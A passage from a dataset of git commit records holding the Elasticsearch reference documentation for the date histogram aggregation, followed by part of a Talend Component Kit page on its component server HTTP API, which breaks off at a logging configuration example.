datehistogram-aggregation.asciidoc (#56664)\n\n","repos":"nknize\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch","old_file":"docs\/reference\/aggregations\/bucket\/datehistogram-aggregation.asciidoc","new_file":"docs\/reference\/aggregations\/bucket\/datehistogram-aggregation.asciidoc","new_contents":"[[search-aggregations-bucket-datehistogram-aggregation]]\n=== Date histogram aggregation\n\nThis multi-bucket aggregation is similar to the normal\n<<search-aggregations-bucket-histogram-aggregation,histogram>>, but it can\nonly be used with date or date range values. Because dates are represented internally in \nElasticsearch as long values, it is possible, but not as accurate, to use the\nnormal `histogram` on dates as well. The main difference in the two APIs is\nthat here the interval can be specified using date\/time expressions. 
Time-based\ndata requires special support because time-based intervals are not always a\nfixed length.\n\n[[calendar_and_fixed_intervals]]\n==== Calendar and fixed intervals\n\nWhen configuring a date histogram aggregation, the interval can be specified\nin two manners: calendar-aware time intervals, and fixed time intervals.\n\nCalendar-aware intervals understand that daylight savings changes the length\nof specific days, months have different amounts of days, and leap seconds can\nbe tacked onto a particular year.\n\nFixed intervals are, by contrast, always multiples of SI units and do not change\nbased on calendaring context.\n\n[NOTE]\n.Combined `interval` field is deprecated\n==================================\ndeprecated[7.2, `interval` field is deprecated] Historically both calendar and fixed\nintervals were configured in a single `interval` field, which led to confusing\nsemantics. Specifying `1d` would be assumed as a calendar-aware time,\nwhereas `2d` would be interpreted as fixed time. To get \"one day\" of fixed time,\nthe user would need to specify the next smaller unit (in this case, `24h`).\n\nThis combined behavior was often unknown to users, and even when knowledgeable about\nthe behavior it was difficult to use and confusing.\n\nThis behavior has been deprecated in favor of two new, explicit fields: `calendar_interval`\nand `fixed_interval`.\n\nBy forcing a choice between calendar and intervals up front, the semantics of the interval\nare clear to the user immediately and there is no ambiguity. The old `interval` field\nwill be removed in the future.\n==================================\n\n[[calendar_intervals]]\n===== Calendar intervals\n\nCalendar-aware intervals are configured with the `calendar_interval` parameter.\nCalendar intervals can only be specified in \"singular\" quantities of the unit\n(`1d`, `1M`, etc). 
Multiples, such as `2d`, are not supported and will throw an exception.\n\nThe accepted units for calendar intervals are:\n\nminute (`m`, `1m`) ::\nAll minutes begin at 00 seconds.\n\nOne minute is the interval between 00 seconds of the first minute and 00\nseconds of the following minute in the specified timezone, compensating for any\nintervening leap seconds, so that the number of minutes and seconds past the\nhour is the same at the start and end.\n\nhour (`h`, `1h`) ::\nAll hours begin at 00 minutes and 00 seconds.\n\nOne hour (1h) is the interval between 00:00 minutes of the first hour and 00:00\nminutes of the following hour in the specified timezone, compensating for any\nintervening leap seconds, so that the number of minutes and seconds past the hour\nis the same at the start and end.\n\n\nday (`d`, `1d`) ::\nAll days begin at the earliest possible time, which is usually 00:00:00\n(midnight).\n\nOne day (1d) is the interval between the start of the day and the start of\nof the following day in the specified timezone, compensating for any intervening\ntime changes.\n\nweek (`w`, `1w`) ::\n\nOne week is the interval between the start day_of_week:hour:minute:second\nand the same day of the week and time of the following week in the specified\ntimezone.\n\nmonth (`M`, `1M`) ::\n\nOne month is the interval between the start day of the month and time of\nday and the same day of the month and time of the following month in the specified\ntimezone, so that the day of the month and time of day are the same at the start\nand end.\n\nquarter (`q`, `1q`) ::\n\nOne quarter (1q) is the interval between the start day of the month and\ntime of day and the same day of the month and time of day three months later,\nso that the day of the month and time of day are the same at the start and end. +\n\nyear (`y`, `1y`) ::\n\nOne year (1y) is the interval between the start day of the month and time of\nday and the same day of the month and time of day the following year in the\nspecified timezone, so that the date and time are the same at the start and end. 
+\n\n[[calendar_interval_examples]]\n===== Calendar interval examples\nAs an example, here is an aggregation requesting bucket intervals of a month in calendar time:\n\n[source,console,id=datehistogram-aggregation-calendar-interval-example]\n--------------------------------------------------\nPOST \/sales\/_search?size=0\n{\n \"aggs\" : {\n \"sales_over_time\" : {\n \"date_histogram\" : {\n \"field\" : \"date\",\n \"calendar_interval\" : \"month\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:sales]\n\nIf you attempt to use multiples of calendar units, the aggregation will fail because only\nsingular calendar units are supported:\n\n[source,console,id=datehistogram-aggregation-calendar-interval-multiples-example]\n--------------------------------------------------\nPOST \/sales\/_search?size=0\n{\n \"aggs\" : {\n \"sales_over_time\" : {\n \"date_histogram\" : {\n \"field\" : \"date\",\n \"calendar_interval\" : \"2d\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:sales]\n\/\/ TEST[catch:bad_request]\n\n[source,js]\n--------------------------------------------------\n{\n \"error\" : {\n \"root_cause\" : [...],\n \"type\" : \"x_content_parse_exception\",\n \"reason\" : \"[1:82] [date_histogram] failed to parse field [calendar_interval]\",\n \"caused_by\" : {\n \"type\" : \"illegal_argument_exception\",\n \"reason\" : \"The supplied interval [2d] could not be parsed as a calendar interval.\",\n \"stack_trace\" : \"java.lang.IllegalArgumentException: The supplied interval [2d] could not be parsed as a calendar interval.\"\n }\n }\n}\n\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\n[[fixed_intervals]]\n===== Fixed intervals\n\nFixed intervals are configured with the `fixed_interval` parameter.\n\nIn contrast to calendar-aware intervals, fixed intervals are a fixed number of SI\nunits and never deviate, regardless of where they fall on the calendar. One second\nis always composed of 1000ms. This allows fixed intervals to be specified in\nany multiple of the supported units.\n\nHowever, it means fixed intervals cannot express other units such as months,\nsince the duration of a month is not a fixed quantity. 
Attempting to specify\na calendar interval like month or quarter will throw an exception.\n\nThe accepted units for fixed intervals are:\n\nmilliseconds (ms) ::\n\nseconds (s) ::\nDefined as 1000 milliseconds each\n\nminutes (m) ::\nAll minutes begin at 00 seconds.\nDefined as 60 seconds each (60,000 milliseconds)\n\nhours (h) ::\nAll hours begin at 00 minutes and 00 seconds.\nDefined as 60 minutes each (3,600,000 milliseconds)\n\ndays (d) ::\nAll days begin at the earliest possible time, which is usually 00:00:00\n(midnight).\nDefined as 24 hours (86,400,000 milliseconds)\n\n[[fixed_interval_examples]]\n===== Fixed interval examples\n\nIf we try to recreate the \"month\" `calendar_interval` from earlier, we can approximate that with\n30 fixed days:\n\n[source,console,id=datehistogram-aggregation-fixed-interval-example]\n--------------------------------------------------\nPOST \/sales\/_search?size=0\n{\n \"aggs\" : {\n \"sales_over_time\" : {\n \"date_histogram\" : {\n \"field\" : \"date\",\n \"fixed_interval\" : \"30d\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:sales]\n\nBut if we try to use a calendar unit that is not supported, such as weeks, we'll get an exception:\n\n[source,console,id=datehistogram-aggregation-fixed-interval-unsupported-example]\n--------------------------------------------------\nPOST \/sales\/_search?size=0\n{\n \"aggs\" : {\n \"sales_over_time\" : {\n \"date_histogram\" : {\n \"field\" : \"date\",\n \"fixed_interval\" : \"2w\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:sales]\n\/\/ TEST[catch:bad_request]\n\n[source,js]\n--------------------------------------------------\n{\n \"error\" : {\n \"root_cause\" : [...],\n \"type\" : \"x_content_parse_exception\",\n \"reason\" : \"[1:82] [date_histogram] failed to parse field [fixed_interval]\",\n \"caused_by\" : {\n \"type\" : \"illegal_argument_exception\",\n \"reason\" : \"failed to parse setting [date_histogram.fixedInterval] with value [2w] as a time value: unit is missing or unrecognized\",\n \"stack_trace\" : \"java.lang.IllegalArgumentException: failed to parse setting [date_histogram.fixedInterval] with value [2w] as a time value: unit is missing or unrecognized\"\n }\n }\n}\n\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\n===== Notes\n\nIn all cases, when the specified end time does not exist, the actual end time is\nthe closest available time after the specified end.\n\nWidely distributed applications must also consider vagaries such as countries that\nstart and stop daylight savings time at 12:01 A.M., so end up with one minute of \nSunday followed by an additional 59 minutes of Saturday once a year, and countries\nthat decide to move across the international date line. Situations like\nthat can make irregular timezone offsets seem easy. 
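\n\nOne way to probe such cases is to bucket the same data with a calendar day and a fixed 24-hour interval in a DST-observing timezone and compare the bucket boundaries; the two only diverge on transition days, where the calendar bucket covers 23 or 25 hours. A sketch reusing the `sales` index (`America\/New_York` is an arbitrary choice):\n\n[source,console]\n--------------------------------------------------\nPOST \/sales\/_search?size=0\n{\n \"aggs\" : {\n \"calendar_day\" : {\n \"date_histogram\" : {\n \"field\" : \"date\",\n \"calendar_interval\" : \"1d\",\n \"time_zone\" : \"America\/New_York\"\n }\n },\n \"fixed_day\" : {\n \"date_histogram\" : {\n \"field\" : \"date\",\n \"fixed_interval\" : \"24h\",\n \"time_zone\" : \"America\/New_York\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:sales]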
\n\nAs always, rigorous testing, especially around time-change events, will ensure\nthat your time interval specification is\nwhat you intend it to be.\n\nWARNING: To avoid unexpected results, all connected servers and clients must sync to a\nreliable network time service.\n\nNOTE: Fractional time values are not supported, but you can address this by\nshifting to another time unit (e.g., `1.5h` could instead be specified as `90m`).\n\nNOTE: You can also specify time values using abbreviations supported by\n<<time-units,time units>> parsing.\n\n===== Keys\n\nInternally, a date is represented as a 64-bit number representing a timestamp\nin milliseconds-since-the-epoch (01\/01\/1970 midnight UTC). These timestamps are\nreturned as the ++key++ name of the bucket. The `key_as_string` is the same\ntimestamp converted to a formatted\ndate string using the `format` parameter specification:\n\nTIP: If you don't specify `format`, the first date\n<<mapping-date-format,format>> specified in the field mapping is used.\n\n[source,console,id=datehistogram-aggregation-format-example]\n--------------------------------------------------\nPOST \/sales\/_search?size=0\n{\n \"aggs\" : {\n \"sales_over_time\" : {\n \"date_histogram\" : {\n \"field\" : \"date\",\n \"calendar_interval\" : \"1M\",\n \"format\" : \"yyyy-MM-dd\" <1>\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:sales]\n\n<1> Supports expressive date <<date-format-pattern,format pattern>>\n\nResponse:\n\n[source,console-result]\n--------------------------------------------------\n{\n ...\n \"aggregations\": {\n \"sales_over_time\": {\n \"buckets\": [\n {\n \"key_as_string\": \"2015-01-01\",\n \"key\": 1420070400000,\n \"doc_count\": 3\n },\n {\n \"key_as_string\": \"2015-02-01\",\n \"key\": 1422748800000,\n \"doc_count\": 2\n },\n {\n \"key_as_string\": \"2015-03-01\",\n \"key\": 1425168000000,\n \"doc_count\": 2\n }\n ]\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\"took\": $body.took,\"timed_out\": false,\"_shards\": $body._shards,\"hits\": $body.hits,\/]\n\n===== Timezone\n\nDate-times are stored in Elasticsearch in UTC. By default, all bucketing and\nrounding is also done in UTC. Use the `time_zone` parameter to indicate\nthat bucketing should use a different timezone.\n\nYou can specify timezones as either an ISO 8601 UTC offset (e.g. `+01:00` or\n`-08:00`) or as a timezone ID as specified in the IANA timezone database,\nsuch as `America\/Los_Angeles`.\n\nConsider the following example:\n\n[source,console,id=datehistogram-aggregation-timezone-example]\n---------------------------------\nPUT my_index\/_doc\/1?refresh\n{\n \"date\": \"2015-10-01T00:30:00Z\"\n}\n\nPUT my_index\/_doc\/2?refresh\n{\n \"date\": \"2015-10-01T01:30:00Z\"\n}\n\nGET my_index\/_search?size=0\n{\n \"aggs\": {\n \"by_day\": {\n \"date_histogram\": {\n \"field\": \"date\",\n \"calendar_interval\": \"day\"\n }\n }\n }\n}\n---------------------------------\n\nIf you don't specify a timezone, UTC is used. 
This would result in both of these\ndocuments being placed into the same day bucket, which starts at midnight UTC\non 1 October 2015:\n\n[source,console-result]\n---------------------------------\n{\n ...\n \"aggregations\": {\n \"by_day\": {\n \"buckets\": [\n {\n \"key_as_string\": \"2015-10-01T00:00:00.000Z\",\n \"key\": 1443657600000,\n \"doc_count\": 2\n }\n ]\n }\n }\n}\n---------------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\"took\": $body.took,\"timed_out\": false,\"_shards\": $body._shards,\"hits\": $body.hits,\/]\n\nIf you specify a `time_zone` of `-01:00`, midnight in that timezone is one hour\nbefore midnight UTC:\n\n[source,console]\n---------------------------------\nGET my_index\/_search?size=0\n{\n \"aggs\": {\n \"by_day\": {\n \"date_histogram\": {\n \"field\": \"date\",\n \"calendar_interval\": \"day\",\n \"time_zone\": \"-01:00\"\n }\n }\n }\n}\n---------------------------------\n\/\/ TEST[continued]\n\nNow the first document falls into the bucket for 30 September 2015, while the\nsecond document falls into the bucket for 1 October 2015:\n\n[source,console-result]\n---------------------------------\n{\n ...\n \"aggregations\": {\n \"by_day\": {\n \"buckets\": [\n {\n \"key_as_string\": \"2015-09-30T00:00:00.000-01:00\", <1>\n \"key\": 1443574800000,\n \"doc_count\": 1\n },\n {\n \"key_as_string\": \"2015-10-01T00:00:00.000-01:00\", <1>\n \"key\": 1443661200000,\n \"doc_count\": 1\n }\n ]\n }\n }\n}\n---------------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\"took\": $body.took,\"timed_out\": false,\"_shards\": $body._shards,\"hits\": $body.hits,\/]\n\n<1> The `key_as_string` value represents midnight on each day\n in the specified timezone.\n\nWARNING: When using time zones that follow DST (daylight saving time) changes,\nbuckets close to the moment when those changes happen can have slightly different\nsizes than you would expect from the specified `interval`.\nFor example, consider a DST start in the `CET` time zone: on 27 March 2016 at 2am,\nclocks were turned forward 1 hour to 3am local time. If you use `day` as `interval`,\nthe bucket covering that day will only hold data for 23 hours instead of the usual\n24 hours for other buckets. The same is true for shorter intervals, like 12h,\nwhere you'll have only an 11h bucket on the morning of 27 March when the DST shift\nhappens.\n\n[[search-aggregations-bucket-datehistogram-offset]]\n===== Offset\n\n\/\/ tag::offset-explanation[]\nUse the `offset` parameter to change the start value of each bucket by the\nspecified positive (`+`) or negative offset (`-`) duration, such as `1h` for\nan hour, or `1d` for a day. See <<time-units>> for more possible time\nduration options.\n\nFor example, when using an interval of `day`, each bucket runs from midnight\nto midnight. 
Setting the `offset` parameter to `+6h` changes each bucket\nto run from 6am to 6am:\n\/\/ end::offset-explanation[]\n\n[source,console,id=datehistogram-aggregation-offset-example]\n-----------------------------\nPUT my_index\/_doc\/1?refresh\n{\n \"date\": \"2015-10-01T05:30:00Z\"\n}\n\nPUT my_index\/_doc\/2?refresh\n{\n \"date\": \"2015-10-01T06:30:00Z\"\n}\n\nGET my_index\/_search?size=0\n{\n \"aggs\": {\n \"by_day\": {\n \"date_histogram\": {\n \"field\": \"date\",\n \"calendar_interval\": \"day\",\n \"offset\": \"+6h\"\n }\n }\n }\n}\n-----------------------------\n\n\/\/ tag::offset-result-intro[]\nInstead of a single bucket starting at midnight, the above request groups the\ndocuments into buckets starting at 6am:\n\/\/ end::offset-result-intro[]\n\n[source,console-result]\n-----------------------------\n{\n ...\n \"aggregations\": {\n \"by_day\": {\n \"buckets\": [\n {\n \"key_as_string\": \"2015-09-30T06:00:00.000Z\",\n \"key\": 1443592800000,\n \"doc_count\": 1\n },\n {\n \"key_as_string\": \"2015-10-01T06:00:00.000Z\",\n \"key\": 1443679200000,\n \"doc_count\": 1\n }\n ]\n }\n }\n}\n-----------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\"took\": $body.took,\"timed_out\": false,\"_shards\": $body._shards,\"hits\": $body.hits,\/]\n\n\/\/ tag::offset-note[]\nNOTE: The start `offset` of each bucket is calculated after `time_zone`\nadjustments have been made.\n\/\/ end::offset-note[]\n\n===== Keyed response\n\nSetting the `keyed` flag to `true` associates a unique string key with each\nbucket and returns the buckets as a hash rather than an array:\n\n[source,console,id=datehistogram-aggregation-keyed-example]\n--------------------------------------------------\nPOST \/sales\/_search?size=0\n{\n \"aggs\" : {\n \"sales_over_time\" : {\n \"date_histogram\" : {\n \"field\" : \"date\",\n \"calendar_interval\" : \"1M\",\n \"format\" : \"yyyy-MM-dd\",\n \"keyed\": true\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:sales]\n\nResponse:\n\n[source,console-result]\n--------------------------------------------------\n{\n ...\n \"aggregations\": {\n \"sales_over_time\": {\n \"buckets\": {\n \"2015-01-01\": {\n \"key_as_string\": \"2015-01-01\",\n \"key\": 1420070400000,\n \"doc_count\": 3\n },\n \"2015-02-01\": {\n \"key_as_string\": \"2015-02-01\",\n \"key\": 1422748800000,\n \"doc_count\": 2\n },\n \"2015-03-01\": {\n \"key_as_string\": \"2015-03-01\",\n \"key\": 1425168000000,\n \"doc_count\": 2\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\"took\": $body.took,\"timed_out\": false,\"_shards\": $body._shards,\"hits\": $body.hits,\/]\n\n===== Scripts\n\nAs with the normal <<search-aggregations-bucket-histogram-aggregation,histogram>>,\nboth document-level scripts and\nvalue-level scripts are supported. You can control the order of the returned\nbuckets using the `order`\nsetting and filter the returned buckets based on a `min_doc_count` setting\n(by default all buckets between the first\nbucket that matches documents and the last one are returned). This histogram\nalso supports the `extended_bounds`\nsetting, which enables extending the bounds of the histogram beyond the data\nitself. 
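For instance, here is a sketch that returns empty monthly buckets for all of 2015 by combining `extended_bounds` with `min_doc_count: 0` (the bound values are illustrative):\n\n[source,console]\n--------------------------------------------------\nPOST \/sales\/_search?size=0\n{\n \"aggs\" : {\n \"sales_over_time\" : {\n \"date_histogram\" : {\n \"field\" : \"date\",\n \"calendar_interval\" : \"1M\",\n \"min_doc_count\" : 0,\n \"extended_bounds\" : {\n \"min\" : \"2015-01-01\",\n \"max\" : \"2015-12-31\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:sales]\n\n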
For more information, see\n<<search-aggregations-bucket-histogram-aggregation-extended-bounds,`Extended Bounds`>>.\n\n===== Missing value\n\nThe `missing` parameter defines how to treat documents that are missing a value.\nBy default, they are ignored, but it is also possible to treat them as if they\nhad a value.\n\n[source,console,id=datehistogram-aggregation-missing-example]\n--------------------------------------------------\nPOST \/sales\/_search?size=0\n{\n \"aggs\" : {\n \"sale_date\" : {\n \"date_histogram\" : {\n \"field\" : \"date\",\n \"calendar_interval\": \"year\",\n \"missing\": \"2000\/01\/01\" <1>\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:sales]\n\n<1> Documents without a value in the `date` field will fall into the\nsame bucket as documents that have the value `2000-01-01`.\n\n===== Order\n\nBy default, the returned buckets are sorted by their `key` ascending, but you can\ncontrol the order using\nthe `order` setting. This setting supports the same `order` functionality as\n<<search-aggregations-bucket-terms-aggregation-order,`Terms Aggregation`>>.\n\n===== Using a script to aggregate by day of the week\n\nWhen you need to aggregate the results by day of the week, use a script that\nreturns the day of the week:\n\n\n[source,console,id=datehistogram-aggregation-script-example]\n--------------------------------------------------\nPOST \/sales\/_search?size=0\n{\n \"aggs\": {\n \"dayOfWeek\": {\n \"terms\": {\n \"script\": {\n \"lang\": \"painless\",\n \"source\": \"doc['date'].value.dayOfWeekEnum.value\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:sales]\n\nResponse:\n\n[source,console-result]\n--------------------------------------------------\n{\n ...\n \"aggregations\": {\n \"dayOfWeek\": {\n \"doc_count_error_upper_bound\": 0,\n \"sum_other_doc_count\": 0,\n \"buckets\": [\n {\n \"key\": \"7\",\n \"doc_count\": 4\n },\n {\n \"key\": \"4\",\n \"doc_count\": 3\n }\n ]\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\"took\": $body.took,\"timed_out\": false,\"_shards\": $body._shards,\"hits\": $body.hits,\/]\n\nThe response will contain all the buckets having the relative day of\nthe week as key: 1 for Monday, 2 for Tuesday... 7 for Sunday.\n
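If you prefer readable day names over numbers, a variant of the script (a sketch using the Painless `getDisplayName` helper on the same enum) can return them directly:\n\n[source,console]\n--------------------------------------------------\nPOST \/sales\/_search?size=0\n{\n \"aggs\": {\n \"dayOfWeek\": {\n \"terms\": {\n \"script\": {\n \"lang\": \"painless\",\n \"source\": \"doc['date'].value.dayOfWeekEnum.getDisplayName(TextStyle.FULL, Locale.ROOT)\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:sales]\n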
","old_contents":"","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0bb5ad60de4aa289d20d7eac9723163fbebeb27f","subject":"no more need to reference restlet studio","message":"no more need to reference restlet studio\n","repos":"chmyga\/component-runtime,chmyga\/component-runtime,chmyga\/component-runtime,chmyga\/component-runtime","old_file":"documentation\/src\/main\/antora\/modules\/ROOT\/pages\/documentation-rest.adoc","new_file":"documentation\/src\/main\/antora\/modules\/ROOT\/pages\/documentation-rest.adoc","new_contents":"= Component server and HTTP API\n:page-partial:\n:page-talend_swaggerui: true\n:description: Learn about Talend Component Kit HTTP API and the component server\n:keywords: REST API\n\n== HTTP API\n\nThe HTTP API intends to expose most Talend Component Kit features over HTTP. It is a standalone Java HTTP server.\n\nTIP: The WebSocket protocol is activated for the endpoints. Endpoints then use `\/websocket\/v1` as base instead of `\/api\/v1`. 
See <<websocket-transport,WebSocket>> for more details.\n\nHere is the API:\n\ninclude::{partialsdir}\/generated_rest-resources.adoc[leveloffset=+2]\n\nIMPORTANT: To make sure that the migration can be enabled, you need to set the version the component was created with in the execution configuration that you send to the server (the component version is available through the component detail endpoint). To do that, use the `tcomp::component::version` key.\n\n=== Deprecated endpoints\n\nEndpoints that are intended to disappear will be deprecated. An `X-Talend-Warning` header will be returned with a message as value.\n\n[[websocket-transport]]\n=== WebSocket transport\n\nYou can connect to any endpoint by:\n\n. Replacing `\/api` with `\/websocket`\n. Appending `\/<http method>` to the URL\n. Formatting the request as:\n\n[source]\n----\nSEND\ndestination: <endpoint after v1>\n<headers>\n\n<payload>^@\n----\n\nFor example:\n\n[source]\n----\nSEND\ndestination: \/component\/index\nAccept: application\/json\n\n^@\n----\n\nThe response is formatted as follows:\n\n[source]\n----\nMESSAGE\nstatus: <http status code>\n<headers>\n\n<payload>^@\n----\n\nTIP: All endpoints are logged at startup. You can then find them in the logs if you have a doubt about which one to use.\n\nIf you don't want to create a pool of connections per endpoint\/verb, you can use the bus endpoint: `\/websocket\/v1\/bus`.\nThis endpoint requires that you add the `destinationMethod` header to each request with the verb value (`GET` by default):\n\n[source]\n----\nSEND\ndestination: \/component\/index\ndestinationMethod: GET\nAccept: application\/json\n\n^@\n----\n\n== HTTPS activation\n\nUsing the server ZIP (or https:\/\/github.com\/Talend\/component-runtime\/blob\/master\/.docker\/Dockerfile[Docker image]), you can configure HTTPS by adding properties to `MEECROWAVE_OPTS`. 
Assuming that you have a certificate in `\/opt\/certificates\/component.p12` (don't forget to add\/mount it in the Docker image if you use it), you can activate it as follows:\n\n[source,bash]\n----\n# use -e for Docker\n#\n# this skips the http port binding and only binds https on the port 8443, and setups the correct certificate\nexport MEECROWAVE_OPTS=\"-Dskip-http=true -Dssl=true -Dhttps=8443 -Dkeystore-type=PKCS12 -Dkeystore-alias=talend -Dkeystore-password=talend -Dkeystore-file=\/opt\/certificates\/component.p12\"\n----\n\n== Web forms and REST API\n\nThe `component-form` library provides a way to build a component REST API facade that is compatible with the React form library.\n\nFor example:\n\n[source,java]\n----\n@Path(\"tacokit-facade\")\n@ApplicationScoped\npublic class ComponentFacade {\n private static final String[] EMPTY_ARRAY = new String[0];\n\n @Inject\n private Client client;\n\n @Inject\n private ActionService actionService;\n\n @Inject\n private UiSpecService uiSpecService;\n\n @Inject \/\/ assuming it is available in your app, use any client you want\n private WebTarget target;\n\n @POST\n @Path(\"action\")\n public void action(@Suspended final AsyncResponse response, @QueryParam(\"family\") final String family,\n @QueryParam(\"type\") final String type, @QueryParam(\"action\") final String action,\n final Map<String, Object> params) {\n client.action(family, type, action, params).handle((r, e) -> {\n if (e != null) {\n onException(response, e);\n } else {\n response.resume(actionService.map(type, r));\n }\n return null;\n });\n }\n\n @GET\n @Path(\"index\")\n public void getIndex(@Suspended final AsyncResponse response,\n @QueryParam(\"language\") @DefaultValue(\"en\") final String language) {\n target\n .path(\"component\/index\")\n .queryParam(\"language\", language)\n .request(APPLICATION_JSON_TYPE)\n .rx()\n .get(ComponentIndices.class)\n .toCompletableFuture()\n .handle((index, e) -> {\n if (e != null) {\n onException(response, e);\n } else {\n index.getComponents().stream().flatMap(c -> c.getLinks().stream()).forEach(\n link -> link.setPath(link.getPath().replaceFirst(\"\/component\/\", \"\/application\/\").replace(\n \"\/details?identifiers=\", \"\/detail\/\")));\n response.resume(index);\n }\n return null;\n });\n }\n\n @GET\n @Path(\"detail\/{id}\")\n public void getDetail(@Suspended final AsyncResponse response,\n @QueryParam(\"language\") @DefaultValue(\"en\") final String language, @PathParam(\"id\") final String id) {\n target\n .path(\"component\/details\")\n .queryParam(\"language\", language)\n .queryParam(\"identifiers\", id)\n .request(APPLICATION_JSON_TYPE)\n .rx()\n .get(ComponentDetailList.class)\n .toCompletableFuture()\n .thenCompose(result -> uiSpecService.convert(result.getDetails().iterator().next()))\n .handle((result, e) -> {\n if (e != null) {\n onException(response, e);\n } else {\n response.resume(result);\n }\n return null;\n });\n }\n\n private void onException(final AsyncResponse response, final Throwable e) {\n final UiActionResult payload;\n final int status;\n if (WebException.class.isInstance(e)) {\n final WebException we = WebException.class.cast(e);\n status = we.getStatus();\n payload = actionService.map(we);\n } else if (CompletionException.class.isInstance(e)) {\n final CompletionException actualException = CompletionException.class.cast(e);\n log.error(actualException.getMessage(), actualException);\n status = Response.Status.BAD_GATEWAY.getStatusCode();\n payload = actionService.map(new WebException(actualException, -1, 
emptyMap()));\n } else {\n log.error(e.getMessage(), e);\n status = Response.Status.BAD_GATEWAY.getStatusCode();\n payload = actionService.map(new WebException(e, -1, emptyMap()));\n }\n response.resume(new WebApplicationException(Response.status(status).entity(payload).build()));\n }\n}\n----\n\nNOTE: The `Client` can be created using `ClientFactory.createDefault(System.getProperty(\"app.components.base\", \"http:\/\/localhost:8080\/api\/v1\"))` and the service can be a simple `new UiSpecService<>()`. The factory uses JAX-RS if the API is available (assuming a JSON-B provider is registered). Otherwise, it tries to use Spring.\n\nThe conversion from the component model (REST API) to the uiSpec model is done through `UiSpecService`. It is based on the object model which is mapped to a UI model. Having a flat model in the component REST API allows you to customize layers easily.\n\nYou can completely control the available components, tune the rendering by switching the `uiSchema`, and add or remove parts of the form.\nYou can also add custom actions and buttons for specific needs of the application.\n\nNOTE: The\u00a0`\/migrate` endpoint was not shown in the previous snippet but if you need it, add it as well.\n\n=== Using the UiSpec model without the tooling\n\n[source,xml]\n----\n<dependency>\n <groupId>org.talend.sdk.component<\/groupId>\n <artifactId>component-form-model<\/artifactId>\n <version>${talend-component-kit.version}<\/version>\n<\/dependency>\n----\n\nThis Maven dependency provides the UISpec model classes. You can use the `Ui` API (with or without the builders) to create UiSpec representations.\n\nFor example:\n\n[source,java]\n----\nfinal Ui form1 = ui()\n .withJsonSchema(JsonSchema.jsonSchemaFrom(Form1.class).build()) <1>\n .withUiSchema(uiSchema() <2>\n .withKey(\"multiSelectTag\")\n .withRestricted(false)\n .withTitle(\"Simple multiSelectTag\")\n .withDescription(\"This data list accepts values that are not in the list of suggestions\")\n .withWidget(\"multiSelectTag\")\n .build())\n .withProperties(myFormInstance) <3>\n .build();\n\nfinal String json = jsonb.toJson(form1); <4>\n----\n<1> The `JsonSchema` is extracted from reflection on the `Form1` class. Note that `@JsonSchemaIgnore` allows you to ignore a field and `@JsonSchemaProperty` allows you to rename a property.\n<2> A `UiSchema` is programmatically built using the builder API.\n<3> An instance of the form is passed to let the serializer extract its JSON model.\n<4> The `Ui` model, which can be used by UiSpec compatible front widgets, is serialized.\n\nThe model uses the JSON-B API to define the binding. Make sure to have an implementation in your classpath. 
To do that, add the following dependencies:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.geronimo.specs<\/groupId>\n <artifactId>geronimo-jsonb_1.0_spec<\/artifactId>\n <version>1.0<\/version>\n<\/dependency>\n<dependency>\n <groupId>org.apache.geronimo.specs<\/groupId>\n <artifactId>geronimo-json_1.1_spec<\/artifactId>\n <version>1.0<\/version>\n<\/dependency>\n<dependency>\n <groupId>org.apache.johnzon<\/groupId>\n <artifactId>johnzon-jsonb<\/artifactId>\n <version>${johnzon.version}<\/version> <!-- 1.1.5 for instance -->\n<\/dependency>\n----\n\n=== JavaScript integration\n\nIMPORTANT: `component-kit.js` is no longer available (previous versions remain on NPM) since it was replaced by `@talend\/react-containers`.\nThe previous import can be replaced by `import kit from '@talend\/react-containers\/lib\/ComponentForm\/kit';`.\n\nDefault JavaScript integration goes through the link:https:\/\/github.com\/Talend\/ui\/tree\/master\/packages\/forms[Talend UI Forms] library\nand its link:https:\/\/github.com\/Talend\/ui\/tree\/master\/packages\/containers[Containers] wrapper.\n\nDocumentation is now available at the previous links.\n\n== Logging\n\nThe logging uses Log4j2. You can specify a custom configuration by using the `-Dlog4j.configurationFile` system property or by adding a `log4j2.xml` file to the classpath.\n\nHere are some common configurations:\n\n- Console logging:\n\n[source,xml]\n----\n<?xml 